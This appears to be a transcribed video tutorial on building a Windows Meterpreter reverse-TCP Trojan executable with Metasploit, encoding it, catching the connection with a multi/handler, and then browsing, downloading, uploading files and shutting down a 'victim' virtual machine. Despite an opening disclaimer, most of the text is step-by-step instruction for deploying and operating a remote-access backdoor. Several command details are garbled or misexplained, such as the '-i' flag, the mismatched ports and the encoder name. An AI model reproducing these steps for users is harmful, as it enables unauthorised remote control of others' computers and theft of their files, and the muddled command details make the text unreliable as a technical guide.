This tutorial is intended for educational purposes only. Do not use this knowledge for malicious purposes. Unauthorized access to computer systems is illegal and unethical. Always ensure you have explicit permission before conducting any penetration.
Hi guys, in this video we will be learning how to make Trojan using the Metasploit. Firstly, we need to start Metasploit. Now we will write msf console to open Metasploit, and we are using Kali OS. It takes a few seconds to open. Now we will write the command msf which is used to make Trojan -p for payload and Windows and reverse TCP, Windows Meterpreter and reverse TCP and lhost. Here we have to write system IP. We are writing port 555, then -f, where F is used for specific archive file, and we are creating exe file. And now for Windows we have to write another command x86 shikata goni, which is payload name. Now we have to write -i, which stands for ignores case distinction while searching. Now we have to define the file name trojan.exe, and now here we can see that our file is ready. And with ls command we can see our trojan.exe file. Now we do not have Kali Linux, we are using different tool to view our file. For that we will be using a Windows version machine, which will be our target machine. You can see that send this file to a Windows file. Now we have to write a few commands to access the victim machine, which is use exploit /multi-handler, then press enter. We need to set the payload. For this, write set payload Windows /meterpreter /reverse TCP and press enter. Now we need to set host. For this type, set lhost and system type system IP, which we have used during the Trojan making. And also set port, sorry, there is no equals to just type set port lhost and our IP, and then set port 5555 and click enter, and attack start. And also we need to write exploit. Now when the victim run our Trojan file, the victim machine will be connected to our system. After then we can do a lot of things using a different command. So that we are we can see the victim machine connected, and using the ls command we can see the targeted machine file. But in this case we use a virtual machine so that there are not many files. If it will be real machine, there will be a lot of files. Now there are two files, Trojan and system file, so that we are creating one notepad demo file in the targeted machine. Firstly we open notepad and type cybersecurity umbrella, and name will be demo.txt. Now using ls command we can see demo.txt. Now this target machine file we will download into our machine. Again we use the ls command to see the name machine file. Using the download command we download demo.txt to our machine. Boom, demo.txt has been downloaded in our machine. Using the upload command we upload trojan.exe. So we type upload Trojan dot exe. Oh, it's throwing an error because Trojan dot exe is already in the victim machine. If we want to upload a different file, we can easily do that. Now type the help command. We can see a lot of interpreter command that we can use for gathering data from the victim machine. Many commands that we can use here. Creating folder cyber into targeted machine, and boom, we can see the folder is successfully created. Now here we are trying to that trojan.txt upload in cyber folder or not. Type upload cyber slash trojan.exe. Oh, but it's not working. It may be a different command. Then type ls. We can see cyber folder. So using the sysinfo command, we can using the sysinfo command, we can see the victim machine information, and also we can see the targeted machine IP. First, we see the IP. So this is the targeted machine IP. First, we see the IP in our targeted machine. Open the command prompt and type ipconfig. This is a victim machine IP address, and also we can see it's in our machine, which is 10.0.2.15. Then last but not the least, we are going to shut down victim machine. Type shutdown, and boom, victim machine is completely shut down. So this is all about a Trojan. Thank you for watching.